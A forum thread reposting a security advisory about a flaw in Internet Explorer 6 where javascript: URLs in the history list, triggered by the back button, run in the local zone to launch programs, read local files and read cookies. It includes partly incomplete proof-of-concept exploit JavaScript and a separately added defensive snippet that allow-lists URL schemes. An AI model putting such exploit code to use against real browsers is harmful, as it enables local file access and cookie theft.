
Thread: Using the "Back" button on IE is dangerous

  1. #1 s0nIc, "Fastest Thing Alive" (Join Date: Sep 2001, Location: Sydney, Posts: 1,584)

    Using the "Back" button on IE is dangerous

    IE allows URLs containing the javascript protocol in the history list.
    Code injected in the URL will operate in the same zone/domain as the last
    URL viewed. The javascript URL can be set to trigger when a user presses
    the back button.


    The normal behaviour when a page fails to load is to press the back button.
    The error page shown by IE is operating in the local computer zone
    (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000). Thus, we
    can execute code and read local files.


    EXPLOIT:
    ========
    The exploit works as follows: press one of the links and then the back
    button.

    Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
    and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
    test.txt must exist.
    Code:
    --------------------------CUT HERE-------------------------------
    
    Press link and then the backbutton to trigger script.
    
    Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)
    
    Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)
    
    Read c:\test.txt (needs to be created)
    
    Read Google cookie
    
    
    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "res:";
    // The HTML payload strings for execFile/readFile (like the links' hrefs)
    // did not survive in this copy of the advisory; the file argument is unused.
    function execFile(file){
    s = '';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = 'alert(document.cookie);close();';
    backBug(url,s);
    }
    // Builds a javascript: URL and sets it as the current location so it lands
    // in the history list; the payload runs once the back button is pressed.
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")')";
    s+= ";history.back();} else 'location=\""+url;
    s+= "\";document.title=\""+page+"\";';";
    location = s;
    }
    
    
    --------------------------CUT HERE-------------------------------
    Disclaimer:
    ===========
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.


    Source: http://www.xatrix.org/article1384.html
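    An added defensive example, not part of this thread or of the original advisory: the trick above depends on a javascript: (or res:) URL reaching location and the history list, so a page that navigates on user-supplied input should allow-list the scheme before assigning it. The names isSafeNavigationTarget and safeNavigate, the sample inputs and the fake window object are my own; the check relies on the standard WHATWG URL API.

```javascript
// Added example (not from the thread or the advisory): allow-list the scheme
// of any navigation target built from untrusted input, so that javascript:
// and res: URLs like the ones in the advisory never reach location/history.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Remove ASCII control characters and surrounding whitespace; older parsers
// dropped these silently, so "java\tscript:" must not slip past a naive
// prefix check. The URL parser then normalises case ("JAVASCRIPT:" -> "javascript:").
function normalise(candidate) {
  return candidate.replace(/[\u0000-\u001F\u007F]/g, "").trim();
}

// True only when candidate (absolute, or relative to base) resolves to an
// http(s) URL. Anything unparsable or on another scheme is refused.
function isSafeNavigationTarget(candidate, base = "https://example.test/") {
  if (typeof candidate !== "string") return false;
  let url;
  try {
    url = new URL(normalise(candidate), base);
  } catch (e) {
    return false; // unparsable input is never a valid target
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Navigate `win` (defaults to the real window) only when the target passes
// the allow-list. Returns the resolved URL used, or null when refused.
function safeNavigate(target, win = window, base = win.location.href) {
  if (!isSafeNavigationTarget(target, base)) return null;
  const resolved = new URL(normalise(target), base).href;
  win.location.assign(resolved);
  return resolved;
}

// Constructed sample inputs, including the schemes the advisory abuses.
const samples = [
  "https://www.xatrix.org/article1384.html", // allowed
  "/next?step=2",                            // relative, allowed
  "javascript:history.back()",               // refused
  "JAVA\tSCRIPT:alert(document.cookie)",     // refused despite the tab
  "res://shdoclc.dll/dnserror.htm",          // refused: local-zone scheme
];
if (typeof window === "undefined") {
  for (const s of samples) console.log(JSON.stringify(s), "->", isSafeNavigationTarget(s));
}
```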

  2. #2 Hi mom! (Join Date: Aug 2001, Posts: 1,103)
    Ermh, AUCH!... Auch...
    I wish to express my gratitude to the people of Italy. Thank you for inventing pizza.

  3. #3 Banned (Join Date: Sep 2001, Posts: 852)
    Some versions get a JavaScript error; which ones I don't know, but the one at a friend's house gets them.
    RiOtEr
